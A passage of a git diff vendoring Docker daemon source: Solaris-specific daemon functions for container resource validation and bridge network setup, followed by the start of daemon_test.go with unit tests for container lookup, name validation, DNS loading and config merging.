+	if config.CpusetCpus != "" {
+		cpu.Ncpus = config.CpusetCpus
+	}
+
+	return cpu
+}
+
+func (daemon *Daemon) cleanupMountsByID(id string) error {
+	return nil
+}
+
+func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error {
+	//Since config.SecurityOpt is specifically defined as a "List of string values to
+	//customize labels for MLs systems, such as SELinux"
+	//until we figure out how to map to Trusted Extensions
+	//this is being disabled for now on Solaris
+	var (
+		labelOpts []string
+		err       error
+	)
+
+	if len(config.SecurityOpt) > 0 {
+		return errors.New("Security options are not supported on Solaris")
+	}
+
+	container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts)
+	return err
+}
+
+func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) {
+	return nil, nil, nil
+}
+
+func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error {
+	return nil
+}
+
+func (daemon *Daemon) getLayerInit() func(string) error {
+	return nil
+}
+
+func checkKernel() error {
+	// solaris can rely upon checkSystem() below, we don't skew kernel versions
+	return nil
+}
+
+func (daemon *Daemon) getCgroupDriver() string {
+	return ""
+}
+
+func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error {
+	if hostConfig.CPUShares < 0 {
+		logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, solarisMinCPUShares)
+		hostConfig.CPUShares = solarisMinCPUShares
+	} else if hostConfig.CPUShares > solarisMaxCPUShares {
+		logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, solarisMaxCPUShares)
+		hostConfig.CPUShares = solarisMaxCPUShares
+	}
+
+	if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 {
+		// By default, MemorySwap is set to twice the size of Memory.
+		hostConfig.MemorySwap = hostConfig.Memory * 2
+	}
+
+	if hostConfig.ShmSize != 0 {
+		hostConfig.ShmSize = container.DefaultSHMSize
+	}
+	if hostConfig.OomKillDisable == nil {
+		defaultOomKillDisable := false
+		hostConfig.OomKillDisable = &defaultOomKillDisable
+	}
+
+	return nil
+}
+
+// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd
+func UsingSystemd(config *Config) bool {
+	return false
+}
+
+// verifyPlatformContainerSettings performs platform-specific validation of the
+// hostconfig and config structures.
+func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
+	warnings := []string{}
+	sysInfo := sysinfo.New(true)
+	// NOTE: We do not enforce a minimum value for swap limits for zones on Solaris and
+	// therefore we will not do that for Docker container either.
+	if hostConfig.Memory > 0 && !sysInfo.MemoryLimit {
+		warnings = append(warnings, "Your kernel does not support memory limit capabilities. Limitation discarded.")
+		logrus.Warnf("Your kernel does not support memory limit capabilities. Limitation discarded.")
+		hostConfig.Memory = 0
+		hostConfig.MemorySwap = -1
+	}
+	if hostConfig.Memory > 0 && hostConfig.MemorySwap != -1 && !sysInfo.SwapLimit {
+		warnings = append(warnings, "Your kernel does not support swap limit capabilities, memory limited without swap.")
+		logrus.Warnf("Your kernel does not support swap limit capabilities, memory limited without swap.")
+		hostConfig.MemorySwap = -1
+	}
+	if hostConfig.Memory > 0 && hostConfig.MemorySwap > 0 && hostConfig.MemorySwap < hostConfig.Memory {
+		return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage.")
+	}
+	// Solaris NOTE: We allow and encourage setting the swap without setting the memory limit.
+
+	if hostConfig.MemorySwappiness != nil && *hostConfig.MemorySwappiness != -1 && !sysInfo.MemorySwappiness {
+		warnings = append(warnings, "Your kernel does not support memory swappiness capabilities, memory swappiness discarded.")
+		logrus.Warnf("Your kernel does not support memory swappiness capabilities, memory swappiness discarded.")
+		hostConfig.MemorySwappiness = nil
+	}
+	if hostConfig.MemoryReservation > 0 && !sysInfo.MemoryReservation {
+		warnings = append(warnings, "Your kernel does not support memory soft limit capabilities. Limitation discarded.")
+		logrus.Warnf("Your kernel does not support memory soft limit capabilities. Limitation discarded.")
+		hostConfig.MemoryReservation = 0
+	}
+	if hostConfig.Memory > 0 && hostConfig.MemoryReservation > 0 && hostConfig.Memory < hostConfig.MemoryReservation {
+		return warnings, fmt.Errorf("Minimum memory limit should be larger than memory reservation limit, see usage.")
+	}
+	if hostConfig.KernelMemory > 0 && !sysInfo.KernelMemory {
+		warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities. Limitation discarded.")
+		logrus.Warnf("Your kernel does not support kernel memory limit capabilities. Limitation discarded.")
+		hostConfig.KernelMemory = 0
+	}
+	if hostConfig.CPUShares != 0 && !sysInfo.CPUShares {
+		warnings = append(warnings, "Your kernel does not support CPU shares. Shares discarded.")
+		logrus.Warnf("Your kernel does not support CPU shares. Shares discarded.")
+		hostConfig.CPUShares = 0
+	}
+	if hostConfig.CPUShares < 0 {
+		warnings = append(warnings, "Invalid CPUShares value. Must be positive. Discarding.")
+		logrus.Warnf("Invalid CPUShares value. Must be positive. Discarding.")
+		hostConfig.CPUQuota = 0
+	}
+	if hostConfig.CPUShares > 0 && !sysinfo.IsCPUSharesAvailable() {
+		warnings = append(warnings, "Global zone default scheduling class not FSS. Discarding shares.")
+		logrus.Warnf("Global zone default scheduling class not FSS. Discarding shares.")
+		hostConfig.CPUShares = 0
+	}
+
+	// Solaris NOTE: Linux does not do negative checking for CPUShares and Quota here. But it makes sense to.
+	if hostConfig.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod {
+		warnings = append(warnings, "Your kernel does not support CPU cfs period. Period discarded.")
+		logrus.Warnf("Your kernel does not support CPU cfs period. Period discarded.")
+		if hostConfig.CPUQuota > 0 {
+			warnings = append(warnings, "Quota will be applied on default period, not period specified.")
+			logrus.Warnf("Quota will be applied on default period, not period specified.")
+		}
+		hostConfig.CPUPeriod = 0
+	}
+	if hostConfig.CPUQuota != 0 && !sysInfo.CPUCfsQuota {
+		warnings = append(warnings, "Your kernel does not support CPU cfs quota. Quota discarded.")
+		logrus.Warnf("Your kernel does not support CPU cfs quota. Quota discarded.")
+		hostConfig.CPUQuota = 0
+	}
+	if hostConfig.CPUQuota < 0 {
+		warnings = append(warnings, "Invalid CPUQuota value. Must be positive. Discarding.")
+		logrus.Warnf("Invalid CPUQuota value. Must be positive. Discarding.")
+		hostConfig.CPUQuota = 0
+	}
+	if (hostConfig.CpusetCpus != "" || hostConfig.CpusetMems != "") && !sysInfo.Cpuset {
+		warnings = append(warnings, "Your kernel does not support cpuset. Cpuset discarded.")
+		logrus.Warnf("Your kernel does not support cpuset. Cpuset discarded.")
+		hostConfig.CpusetCpus = ""
+		hostConfig.CpusetMems = ""
+	}
+	cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(hostConfig.CpusetCpus)
+	if err != nil {
+		return warnings, fmt.Errorf("Invalid value %s for cpuset cpus.", hostConfig.CpusetCpus)
+	}
+	if !cpusAvailable {
+		return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s.", hostConfig.CpusetCpus, sysInfo.Cpus)
+	}
+	memsAvailable, err := sysInfo.IsCpusetMemsAvailable(hostConfig.CpusetMems)
+	if err != nil {
+		return warnings, fmt.Errorf("Invalid value %s for cpuset mems.", hostConfig.CpusetMems)
+	}
+	if !memsAvailable {
+		return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s.", hostConfig.CpusetMems, sysInfo.Mems)
+	}
+	if hostConfig.BlkioWeight > 0 && !sysInfo.BlkioWeight {
+		warnings = append(warnings, "Your kernel does not support Block I/O weight. Weight discarded.")
+		logrus.Warnf("Your kernel does not support Block I/O weight. Weight discarded.")
+		hostConfig.BlkioWeight = 0
+	}
+	if hostConfig.OomKillDisable != nil && !sysInfo.OomKillDisable {
+		*hostConfig.OomKillDisable = false
+		// Don't warn; this is the default setting but only applicable to Linux
+	}
+
+	if sysInfo.IPv4ForwardingDisabled {
+		warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.")
+		logrus.Warnf("IPv4 forwarding is disabled. Networking will not work")
+	}
+
+	// Solaris NOTE: We do not allow setting Linux specific options, so check and warn for all of them.
+
+	if hostConfig.CapAdd != nil || hostConfig.CapDrop != nil {
+		warnings = append(warnings, "Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.")
+		logrus.Warnf("Adding or dropping kernel capabilities unsupported on Solaris.Discarding capabilities lists.")
+		hostConfig.CapAdd = nil
+		hostConfig.CapDrop = nil
+	}
+
+	if hostConfig.GroupAdd != nil {
+		warnings = append(warnings, "Additional groups unsupported on Solaris.Discarding groups lists.")
+		logrus.Warnf("Additional groups unsupported on Solaris.Discarding groups lists.")
+		hostConfig.GroupAdd = nil
+	}
+
+	if hostConfig.IpcMode != "" {
+		warnings = append(warnings, "IPC namespace assignment unsupported on Solaris.Discarding IPC setting.")
+		logrus.Warnf("IPC namespace assignment unsupported on Solaris.Discarding IPC setting.")
+		hostConfig.IpcMode = ""
+	}
+
+	if hostConfig.PidMode != "" {
+		warnings = append(warnings, "PID namespace setting  unsupported on Solaris. Running container in host PID namespace.")
+		logrus.Warnf("PID namespace setting  unsupported on Solaris. Running container in host PID namespace.")
+		hostConfig.PidMode = ""
+	}
+
+	if hostConfig.Privileged {
+		warnings = append(warnings, "Privileged mode unsupported on Solaris. Discarding privileged mode setting.")
+		logrus.Warnf("Privileged mode unsupported on Solaris. Discarding privileged mode setting.")
+		hostConfig.Privileged = false
+	}
+
+	if hostConfig.UTSMode != "" {
+		warnings = append(warnings, "UTS namespace assignment unsupported on Solaris.Discarding UTS setting.")
+		logrus.Warnf("UTS namespace assignment unsupported on Solaris.Discarding UTS setting.")
+		hostConfig.UTSMode = ""
+	}
+
+	if hostConfig.CgroupParent != "" {
+		warnings = append(warnings, "Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.")
+		logrus.Warnf("Specifying Cgroup parent unsupported on Solaris. Discarding cgroup parent setting.")
+		hostConfig.CgroupParent = ""
+	}
+
+	if hostConfig.Ulimits != nil {
+		warnings = append(warnings, "Specifying ulimits unsupported on Solaris. Discarding ulimits setting.")
+		logrus.Warnf("Specifying ulimits unsupported on Solaris. Discarding ulimits setting.")
+		hostConfig.Ulimits = nil
+	}
+
+	return warnings, nil
+}
+
+// platformReload update configuration with platform specific options
+func (daemon *Daemon) platformReload(config *Config) map[string]string {
+	return map[string]string{}
+}
+
+// verifyDaemonSettings performs validation of daemon config struct
+func verifyDaemonSettings(config *Config) error {
+
+	if config.DefaultRuntime == "" {
+		config.DefaultRuntime = stockRuntimeName
+	}
+	if config.Runtimes == nil {
+		config.Runtimes = make(map[string]types.Runtime)
+	}
+	stockRuntimeOpts := []string{}
+	config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary, Args: stockRuntimeOpts}
+
+	// checkSystem validates platform-specific requirements
+	return nil
+}
+
+func checkSystem() error {
+	// check OS version for compatibility, ensure running in global zone
+	var err error
+	var id C.zoneid_t
+
+	if id, err = C.getzoneid(); err != nil {
+		return fmt.Errorf("Exiting. Error getting zone id: %+v", err)
+	}
+	if int(id) != 0 {
+		return fmt.Errorf("Exiting because the Docker daemon is not running in the global zone")
+	}
+
+	v, err := kernel.GetKernelVersion()
+	if kernel.CompareKernelVersion(*v, kernel.VersionInfo{Kernel: 5, Major: 12, Minor: 0}) < 0 {
+		return fmt.Errorf("Your Solaris kernel version: %s doesn't support Docker. Please upgrade to 5.12.0", v.String())
+	}
+	return err
+}
+
+// configureMaxThreads sets the Go runtime max threads threshold
+// which is 90% of the kernel setting from /proc/sys/kernel/threads-max
+func configureMaxThreads(config *Config) error {
+	return nil
+}
+
+// configureKernelSecuritySupport configures and validate security support for the kernel
+func configureKernelSecuritySupport(config *Config, driverName string) error {
+	return nil
+}
+
+func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
+	netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes)
+	if err != nil {
+		return nil, err
+	}
+
+	controller, err := libnetwork.New(netOptions...)
+	if err != nil {
+		return nil, fmt.Errorf("error obtaining controller instance: %v", err)
+	}
+
+	// Initialize default network on "null"
+	if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false)); err != nil {
+		return nil, fmt.Errorf("Error creating default 'null' network: %v", err)
+	}
+
+	if !config.DisableBridge {
+		// Initialize default driver "bridge"
+		if err := initBridgeDriver(controller, config); err != nil {
+			return nil, err
+		}
+	}
+
+	return controller, nil
+}
+
+func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error {
+	if n, err := controller.NetworkByName("bridge"); err == nil {
+		if err = n.Delete(); err != nil {
+			return fmt.Errorf("could not delete the default bridge network: %v", err)
+		}
+	}
+
+	bridgeName := bridge.DefaultBridgeName
+	if config.bridgeConfig.Iface != "" {
+		bridgeName = config.bridgeConfig.Iface
+	}
+	netOption := map[string]string{
+		bridge.BridgeName:    bridgeName,
+		bridge.DefaultBridge: strconv.FormatBool(true),
+		netlabel.DriverMTU:   strconv.Itoa(config.Mtu),
+		bridge.EnableICC:     strconv.FormatBool(config.bridgeConfig.InterContainerCommunication),
+	}
+
+	// --ip processing
+	if config.bridgeConfig.DefaultIP != nil {
+		netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String()
+	}
+
+	var ipamV4Conf *libnetwork.IpamConf
+
+	ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)}
+
+	nwList, _, err := netutils.ElectInterfaceAddresses(bridgeName)
+	if err != nil {
+		return errors.Wrap(err, "list bridge addresses failed")
+	}
+
+	nw := nwList[0]
+	if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" {
+		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
+		if err != nil {
+			return errors.Wrap(err, "parse CIDR failed")
+		}
+		// Iterate through in case there are multiple addresses for the bridge
+		for _, entry := range nwList {
+			if fCIDR.Contains(entry.IP) {
+				nw = entry
+				break
+			}
+		}
+	}
+
+	ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String()
+	hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask)
+	if hip.IsGlobalUnicast() {
+		ipamV4Conf.Gateway = nw.IP.String()
+	}
+
+	if config.bridgeConfig.IP != "" {
+		ipamV4Conf.PreferredPool = config.bridgeConfig.IP
+		ip, _, err := net.ParseCIDR(config.bridgeConfig.IP)
+		if err != nil {
+			return err
+		}
+		ipamV4Conf.Gateway = ip.String()
+	} else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" {
+		logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool)
+	}
+
+	if config.bridgeConfig.FixedCIDR != "" {
+		_, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR)
+		if err != nil {
+			return err
+		}
+
+		ipamV4Conf.SubPool = fCIDR.String()
+	}
+
+	if config.bridgeConfig.DefaultGatewayIPv4 != nil {
+		ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String()
+	}
+
+	v4Conf := []*libnetwork.IpamConf{ipamV4Conf}
+	v6Conf := []*libnetwork.IpamConf{}
+
+	// Initialize default network on "bridge" with the same name
+	_, err = controller.NewNetwork("bridge", "bridge", "",
+		libnetwork.NetworkOptionDriverOpts(netOption),
+		libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil),
+		libnetwork.NetworkOptionDeferIPv6Alloc(false))
+	if err != nil {
+		return fmt.Errorf("Error creating default 'bridge' network: %v", err)
+	}
+	return nil
+}
+
+// registerLinks sets up links between containers and writes the
+// configuration out for persistence.
+func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error {
+	return nil
+}
+
+func (daemon *Daemon) cleanupMounts() error {
+	return nil
+}
+
+// conditionalMountOnStart is a platform specific helper function during the
+// container start to call mount.
+func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error {
+	return daemon.Mount(container)
+}
+
+// conditionalUnmountOnCleanup is a platform specific helper function called
+// during the cleanup of a container to unmount.
+func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error {
+	return daemon.Unmount(container)
+}
+
+func restoreCustomImage(is image.Store, ls layer.Store, rs reference.Store) error {
+	// Solaris has no custom images to register
+	return nil
+}
+
+func driverOptions(config *Config) []nwconfig.Option {
+	return []nwconfig.Option{}
+}
+
+func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) {
+	return nil, nil
+}
+
+// setDefaultIsolation determine the default isolation mode for the
+// daemon to run in. This is only applicable on Windows
+func (daemon *Daemon) setDefaultIsolation() error {
+	return nil
+}
+
+func rootFSToAPIType(rootfs *image.RootFS) types.RootFS {
+	return types.RootFS{}
+}
+
+func setupDaemonProcess(config *Config) error {
+	return nil
+}
+
+func (daemon *Daemon) setupSeccompProfile() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_test.go b/vendor/github.com/docker/docker/daemon/daemon_test.go
new file mode 100644
index 0000000000..00817bd1b6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_test.go
@@ -0,0 +1,627 @@
+// +build !solaris
+
+package daemon
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"reflect"
+	"testing"
+	"time"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/discovery"
+	_ "github.com/docker/docker/pkg/discovery/memory"
+	"github.com/docker/docker/pkg/registrar"
+	"github.com/docker/docker/pkg/truncindex"
+	"github.com/docker/docker/registry"
+	"github.com/docker/docker/volume"
+	volumedrivers "github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/local"
+	"github.com/docker/docker/volume/store"
+	"github.com/docker/go-connections/nat"
+)
+
+//
+// https://github.com/docker/docker/issues/8069
+//
+
+func TestGetContainer(t *testing.T) {
+	c1 := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57",
+			Name: "tender_bardeen",
+		},
+	}
+
+	c2 := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de",
+			Name: "drunk_hawking",
+		},
+	}
+
+	c3 := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "3cdbd1aa394fd68559fd1441d6eff2abfafdcba06e72d2febdba229008b0bf57",
+			Name: "3cdbd1aa",
+		},
+	}
+
+	c4 := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "75fb0b800922abdbef2d27e60abcdfaf7fb0698b2a96d22d3354da361a6ff4a5",
+			Name: "5a4ff6a163ad4533d22d69a2b8960bf7fafdcba06e72d2febdba229008b0bf57",
+		},
+	}
+
+	c5 := &container.Container{
+		CommonContainer: container.CommonContainer{
+			ID:   "d22d69a2b8960bf7fafdcba06e72d2febdba960bf7fafdcba06e72d2f9008b060b",
+			Name: "d22d69a2b896",
+		},
+	}
+
+	store := container.NewMemoryStore()
+	store.Add(c1.ID, c1)
+	store.Add(c2.ID, c2)
+	store.Add(c3.ID, c3)
+	store.Add(c4.ID, c4)
+	store.Add(c5.ID, c5)
+
+	index := truncindex.NewTruncIndex([]string{})
+	index.Add(c1.ID)
+	index.Add(c2.ID)
+	index.Add(c3.ID)
+	index.Add(c4.ID)
+	index.Add(c5.ID)
+
+	daemon := &Daemon{
+		containers: store,
+		idIndex:    index,
+		nameIndex:  registrar.NewRegistrar(),
+	}
+
+	daemon.reserveName(c1.ID, c1.Name)
+	daemon.reserveName(c2.ID, c2.Name)
+	daemon.reserveName(c3.ID, c3.Name)
+	daemon.reserveName(c4.ID, c4.Name)
+	daemon.reserveName(c5.ID, c5.Name)
+
+	if container, _ := daemon.GetContainer("3cdbd1aa394fd68559fd1441d6eff2ab7c1e6363582c82febfaa8045df3bd8de"); container != c2 {
+		t.Fatal("Should explicitly match full container IDs")
+	}
+
+	if container, _ := daemon.GetContainer("75fb0b8009"); container != c4 {
+		t.Fatal("Should match a partial ID")
+	}
+
+	if container, _ := daemon.GetContainer("drunk_hawking"); container != c2 {
+		t.Fatal("Should match a full name")
+	}
+
+	// c3.Name is a partial match for both c3.ID and c2.ID
+	if c, _ := daemon.GetContainer("3cdbd1aa"); c != c3 {
+		t.Fatal("Should match a full name even though it collides with another container's ID")
+	}
+
+	if container, _ := daemon.GetContainer("d22d69a2b896"); container != c5 {
+		t.Fatal("Should match a container where the provided prefix is an exact match to the its name, and is also a prefix for its ID")
+	}
+
+	if _, err := daemon.GetContainer("3cdbd1"); err == nil {
+		t.Fatal("Should return an error when provided a prefix that partially matches multiple container ID's")
+	}
+
+	if _, err := daemon.GetContainer("nothing"); err == nil {
+		t.Fatal("Should return an error when provided a prefix that is neither a name or a partial match to an ID")
+	}
+}
+
+func initDaemonWithVolumeStore(tmp string) (*Daemon, error) {
+	var err error
+	daemon := &Daemon{
+		repository: tmp,
+		root:       tmp,
+	}
+	daemon.volumes, err = store.New(tmp)
+	if err != nil {
+		return nil, err
+	}
+
+	volumesDriver, err := local.New(tmp, 0, 0)
+	if err != nil {
+		return nil, err
+	}
+	volumedrivers.Register(volumesDriver, volumesDriver.Name())
+
+	return daemon, nil
+}
+
+func TestValidContainerNames(t *testing.T) {
+	invalidNames := []string{"-rm", "&sdfsfd", "safd%sd"}
+	validNames := []string{"word-word", "word_word", "1weoid"}
+
+	for _, name := range invalidNames {
+		if validContainerNamePattern.MatchString(name) {
+			t.Fatalf("%q is not a valid container name and was returned as valid.", name)
+		}
+	}
+
+	for _, name := range validNames {
+		if !validContainerNamePattern.MatchString(name) {
+			t.Fatalf("%q is a valid container name and was returned as invalid.", name)
+		}
+	}
+}
+
+func TestContainerInitDNS(t *testing.T) {
+	tmp, err := ioutil.TempDir("", "docker-container-test-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmp)
+
+	containerID := "d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e"
+	containerPath := filepath.Join(tmp, containerID)
+	if err := os.MkdirAll(containerPath, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	config := `{"State":{"Running":true,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":2464,"ExitCode":0,
+"Error":"","StartedAt":"2015-05-26T16:48:53.869308965Z","FinishedAt":"0001-01-01T00:00:00Z"},
+"ID":"d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e","Created":"2015-05-26T16:48:53.7987917Z","Path":"top",
+"Args":[],"Config":{"Hostname":"d59df5276e7b","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"",
+"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":true,"OpenStdin":true,
+"StdinOnce":false,"Env":null,"Cmd":["top"],"Image":"ubuntu:latest","Volumes":null,"WorkingDir":"","Entrypoint":null,
+"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{}},"Image":"07f8e8c5e66084bef8f848877857537ffe1c47edd01a93af27e7161672ad0e95",
+"NetworkSettings":{"IPAddress":"172.17.0.1","IPPrefixLen":16,"MacAddress":"02:42:ac:11:00:01","LinkLocalIPv6Address":"fe80::42:acff:fe11:1",
+"LinkLocalIPv6PrefixLen":64,"GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"Gateway":"172.17.42.1","IPv6Gateway":"","Bridge":"docker0","Ports":{}},
+"ResolvConfPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/resolv.conf",
+"HostnamePath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/hostname",
+"HostsPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/hosts",
+"LogPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e-json.log",
+"Name":"/ubuntu","Driver":"aufs","MountLabel":"","ProcessLabel":"","AppArmorProfile":"","RestartCount":0,
+"UpdateDns":false,"Volumes":{},"VolumesRW":{},"AppliedVolumesFrom":null}`
+
+	// Container struct only used to retrieve path to config file
+	container := &container.Container{CommonContainer: container.CommonContainer{Root: containerPath}}
+	configPath, err := container.ConfigPath()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err = ioutil.WriteFile(configPath, []byte(config), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	hostConfig := `{"Binds":[],"ContainerIDFile":"","Memory":0,"MemorySwap":0,"CpuShares":0,"CpusetCpus":"",
+"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsOptions":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,
+"Devices":[],"NetworkMode":"bridge","IpcMode":"","PidMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},
+"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":null},"CgroupParent":""}`
+
+	hostConfigPath, err := container.HostConfigPath()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err = ioutil.WriteFile(hostConfigPath, []byte(hostConfig), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	daemon, err := initDaemonWithVolumeStore(tmp)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer volumedrivers.Unregister(volume.DefaultDriverName)
+
+	c, err := daemon.load(containerID)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if c.HostConfig.DNS == nil {
+		t.Fatal("Expected container DNS to not be nil")
+	}
+
+	if c.HostConfig.DNSSearch == nil {
+		t.Fatal("Expected container DNSSearch to not be nil")
+	}
+
+	if c.HostConfig.DNSOptions == nil {
+		t.Fatal("Expected container DNSOptions to not be nil")
+	}
+}
+
+func newPortNoError(proto, port string) nat.Port {
+	p, _ := nat.NewPort(proto, port)
+	return p
+}
+
+func TestMerge(t *testing.T) {
+	volumesImage := make(map[string]struct{})
+	volumesImage["/test1"] = struct{}{}
+	volumesImage["/test2"] = struct{}{}
+	portsImage := make(nat.PortSet)
+	portsImage[newPortNoError("tcp", "1111")] = struct{}{}
+	portsImage[newPortNoError("tcp", "2222")] = struct{}{}
+	configImage := &containertypes.Config{
+		ExposedPorts: portsImage,
+		Env:          []string{"VAR1=1", "VAR2=2"},
+		Volumes:      volumesImage,
+	}
+
+	portsUser := make(nat.PortSet)
+	portsUser[newPortNoError("tcp", "2222")] = struct{}{}
+	portsUser[newPortNoError("tcp", "3333")] = struct{}{}
+	volumesUser := make(map[string]struct{})
+	volumesUser["/test3"] = struct{}{}
+	configUser := &containertypes.Config{
+		ExposedPorts: portsUser,
+		Env:          []string{"VAR2=3", "VAR3=3"},
+		Volumes:      volumesUser,
+	}
+
+	if err := merge(configUser, configImage); err != nil {
+		t.Error(err)
+	}
+
+	if len(configUser.ExposedPorts) != 3 {
+		t.Fatalf("Expected 3 ExposedPorts, 1111, 2222 and 3333, found %d", len(configUser.ExposedPorts))
+	}
+	for portSpecs := range configUser.ExposedPorts {
+		if portSpecs.Port() != "1111" && portSpecs.Port() != "2222" && portSpecs.Port() != "3333" {
+			t.Fatalf("Expected 1111 or 2222 or 3333, found %s", portSpecs)
+		}
+	}
+	if len(configUser.Env) != 3 {
+		t.Fatalf("Expected 3 env var, VAR1=1, VAR2=3 and VAR3=3, found %d", len(configUser.Env))
+	}
+	for _, env := range configUser.Env {
+		if env != "VAR1=1" && env != "VAR2=3" && env != "VAR3=3" {
+			t.Fatalf("Expected VAR1=1 or VAR2=3 or VAR3=3, found %s", env)
+		}
+	}
+
+	if len(configUser.Volumes) != 3 {
+		t.Fatalf("Expected 3 volumes, /test1, /test2 and /test3, found %d", len(configUser.Volumes))
+	}
+	for v := range configUser.Volumes {
+		if v != "/test1" && v != "/test2" && v != "/test3" {
+			t.Fatalf("Expected /test1 or /test2 or /test3, found %s", v)
+		}
+	}
+
+	ports, _, err := nat.ParsePortSpecs([]string{"0000"})
+	if err != nil {
+		t.Error(err)
+	}
+	configImage2 := &containertypes.Config{
+		ExposedPorts: ports,
+	}
+
+	if err := merge(configUser, configImage2); err != nil {
+		t.Error(err)
+	}
+
+	if len(configUser.ExposedPorts) != 4 {
+		t.Fatalf("Expected 4 ExposedPorts, 0000, 1111, 2222 and 3333, found %d", len(configUser.ExposedPorts))
+	}
+	for portSpecs := range configUser.ExposedPorts {
+		if portSpecs.Port() != "0" && portSpecs.Port() != "1111" && portSpecs.Port() != "2222" && portSpecs.Port() != "3333" {
+			t.Fatalf("Expected %q or %q or %q or %q, found %s", 0, 1111, 2222, 3333, portSpecs)
+		}
+	}
+}
+
+func TestDaemonReloadLabels(t *testing.T) {
+	daemon := &Daemon{}
+	daemon.configStore = &Config{
+		CommonConfig: CommonConfig{
+			Labels: []string{"foo:bar"},
+		},
+	}
+
+	valuesSets := make(map[string]interface{})
+	valuesSets["labels"] = "foo:baz"
+	newConfig := &Config{
+		CommonConfig: CommonConfig{
+			Labels:    []string{"foo:baz"},
+			valuesSet: valuesSets,
+		},
+	}
+
+	if err := daemon.Reload(newConfig); err != nil {
+		t.Fatal(err)
+	}
+
+	label := daemon.configStore.Labels[0]
+	if label != "foo:baz" {
